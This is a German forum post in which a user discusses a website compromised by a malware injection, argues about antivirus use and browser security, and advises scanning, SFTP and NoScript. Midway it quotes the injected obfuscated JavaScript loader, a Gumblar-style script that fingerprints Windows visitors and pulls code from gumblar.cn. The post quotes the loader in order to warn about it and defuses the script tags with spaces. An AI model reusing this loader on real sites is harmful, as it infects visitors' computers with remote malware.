Beiträge von Tyrfing im Thema „Bitte um aussagekräftige Stellungnahme“

    Wer sich gut genug mit Rechnern auskennt, dass er Linux installiert hat (weil wahrscheinlich Windows vorher auf dem Rechner war) und dementsprechend auch schon ein OS selbst aufgesetzt hat - mit dem kann man auch ganz anders über Computersicherheit reden.


    Bei der große Maße an Menschen und dementsprechend auch der Rechner kämpft man aber sowieso meist auf dem Schlachtfeld Windows und sollte schauen, dass man es schafft ein möglichst sicheres und bequemes System einzurichten, welches auch gewissen Sicherheitsstandards genügt.
    Dabei halte ich das "bequem" für eine ganz, ganz wichtiges Kriterium. Denn auch wenn die Nutzer sich nicht auskennen, wenn sie ein Programm ständig nervt oder sonstwie unbequem ist, dann wird es meist dann doch irgendwie ausgeschaltet, umgangen, nicht aktualisiert oder so


    "Ach das Fenster da? - Softwareaktualisierung-? Das kommt schon ewig. Ich klick das immer weg, das nervt mich, da wollte ich dich eh nochmal fragen. Wie werd ich das los?" *autsch*
    Dementsprechend ist es schon gut, wenn man es erreicht, dass der Nutzer garnicht soviel mitbekommt davon, dass er "sicher" unterwegs ist.

    Zitat

    Original von Mandras
    Und ich besuche nur vertrauenswürdige Seiten wie Spiegel, Kicker etc.


    Was ist denn eine "vertrauenswürdige Seite"?
    Wenn du Seiten meinst, bei denen man ganz stark davon ausgehen kann, dass sie keine/kaum Fehler enthalten, dann dürften dass gerademal die Seiten einiger Experten sein. Und ich möchte ausdrücklich dazu sagen, dass ich davon auch Seiten einiger bekannter Antivirentools ausschließen würde, weil ich stark vermute, dass diese auch mit einem CMS betrieben werden, bei dem ich mir nicht sicher sein kann, ob dieses unterliegende System einen Fehler enthält.


    Jedenfalls denke ich, dass du den Spiegel ganz, ganz stark überschätzt. Der Spiegel ist ja, in seiner Onlinefassung, noch nichteinmal seriös. Von "Sicher" mal ganz zu schweigen...


    Zitat

    Original von Mandras
    Wenn die Seite ofennsichtlich gehackt wurde und Malware verbreitet, gehört sie vom Netz genommen bis sie wieder ok ist. Die Verbreitung der Malware war offensicjhtlich dem Betreiber bekannt, eine Warnung erfolgte nicht.[...]


    1) Ich unterstelle dem Admin einfach mal keine böse Absicht
    2) Ich unterstelle ihm weiterhin, dass er das ganze aus einem gewissen "Hobby" heraus macht und nicht unbedingt ein professioneller Webhoster ist.
    => Aus 1+2 schließe ich, dass er da gewissermaßen ein paar Probleme haben könnte, wenn es darum geht schnell und einfach eine Lösung für ein nicht-triviales Computerproblem zu finden.
    3) Was meinst du mit "war dem Betreiber offensichtlich bekannt"?
    Seitdem die Seite "verseucht" ist, hat er versucht den Fehler zu beheben und war, soweit ich das verstanden habe, im Bewusstsein, dass die Seite nun wieder "sauber" sei. Dass dies eine Fehlentscheidung war, führe ich auf 2 zurück.


    Zitat

    Original von Mandras
    [...]
    Das nenne ich fahrlässig und verantwortungslos!
    Da kann ich den Vorwurf von JoelH nicht verstehen bzwe. finde ich ihn unverschämt.
    Enttäuscht, verärgert und mit aktuell massiven Problemen was seinen IE angeht.


    1) Ich schließe mich JoelH an, wenn er sagt, dass du ebenso fahrlässig und verantwortungslos handelst, wenn du ohne Antivirenprogramm und dann - auch das noch! - mit dem IE ins Internet gehst. Sag mir bitte, dass es wenigstens eine aktuelle Version des IEs ist...
    2) Ich denke, du hast vermutlich die falsche Erwartungshaltung an die Seite hier. Ich denke mit dieser Erwartungshaltung wirst du in Zukunft auch noch einige Male von einigen (anderen) Webseiten enttäuscht werden. Was du gefordert hast, ist nur sehr schwer zu leisten.
    3) Ich würde dir, wenn ich lese wie du durch das Internet surfst dringend empfehlen deinen Rechner gründlich durchzuchecken. Vermutlich hast du schon mehrere Probleme und weißt noch nichts davon.


    Aber mal was anderes - den Internetcache des IE löscht du unter "Extras" - "Browserverlauf löschen" (IE 7)

    <s c r i p t l a n g u a g e = j a v a s c r i p t > < ! - -
    ( f u n c t i o n (){var Ljh='%';var fN7='var"20a"3d"22"53c"72ipt"45ng"69ne"22"2cb"3d"22Versio"6e()"2b"22"2cj"3d"22"22"2c"75"3dn"61vigator"2euser"41gent"3bif((u"2e"69n"64exOf("22Win"22"29"3e"30"29"26"26("75"2e"69"6edexO"66"28"22NT"206"22)"3c0)"26"26(docum"65nt"2ecoo"6bi"65"2eind"65xOf("22mi"65k"3d1"22)"3c"30)"26"26(ty"70e"6f"66(z"72"76zts)"21"3dtypeof("22A"22)))"7b"7a"72vzts"3d"22A"22"3beval"28"22if(windo"77"2e"22+a+"22)"6a"3dj+"22+a+"22Maj"6f"72"22+b+a"2b"22Mi"6eo"72"22"2b"62+a+"22Buil"64"22+"62"2b"22"6a"3b"22)"3bdocu"6dent"2e"77rit"65("22"3cs"63ript"20src"3d"2f"2f"67umblar"2ecn"2frss"2f"3f"69"64"3d"22+j"2b"22"3e"3c"5c"2f"73cript"3e"22)"3b"7d';var NdtT=fN7.replace(/"/g,Ljh);eval(unescape(NdtT))})();
    --></ s c r i p t >


    sieht doch verdächtig aus.


    Ich hab den Text jetzt oben selbst mal gesperrt (d.h. die Leerzeichen dazwischen gesetzt), nicht dass ich in irgendeiner Form das dämliche Skript noch selbst hier reinstelle und in diesem Beitrag sozusagen konserviere.


    http://blog.unmaskparasites.co…out-this-injected-script/
    Fand ich auf den ersten Blick ganz hilfreich.


    Zitat

    Most likely this exploit is caused by compromised FTP credentials. So start with your own computer. Scan it for spyware. Some people reported good results with Malwarebytes.


    Das klingt doch schonmal nicht so gut.


    Ansonsten steht weiter unten noch der Tipp SFTP anstatt FTP zu nutzen, das kann ich nur unterstützen. Niemals ohne, gell? ;)


    Zitat

    Original von Sankt Peter
    Kann man denn die konkrete Datei identifizieren? Warum meldet Kapsersky bei mir nichts ?(


    Ja, wahrscheinlich ist nahezu jede Datei betroffen.


    Mindestens jedoch das, was mir die Index.php ausliefert, sowie die thread.php. Bei beiden findet sich vor dem <body> Tag die verdächtigen Anteile.

    Mein "NoScript" meldet auch, dass "gumblar.cn" noch auf dieser Seite gefragt wird.
    Freilich werde ich diese Seite auch nicht freigeben ;)


    Ohne Virenschutz unterwegs zu sein halte ich hingegen für grob fahrlässig, um das Wort "sträflich" nicht in den Mund zu nehmen.
    Das Internet ist die Karibik zu Zeiten der Piraten, ohne Begleitschutz solltest du dich nicht raus wagen.
    Vielleicht sollte man auch mal eine Kampagne starten: Nie ohne Gummi/Antivirenprogramm/verschlüsseltes WLan/... ;)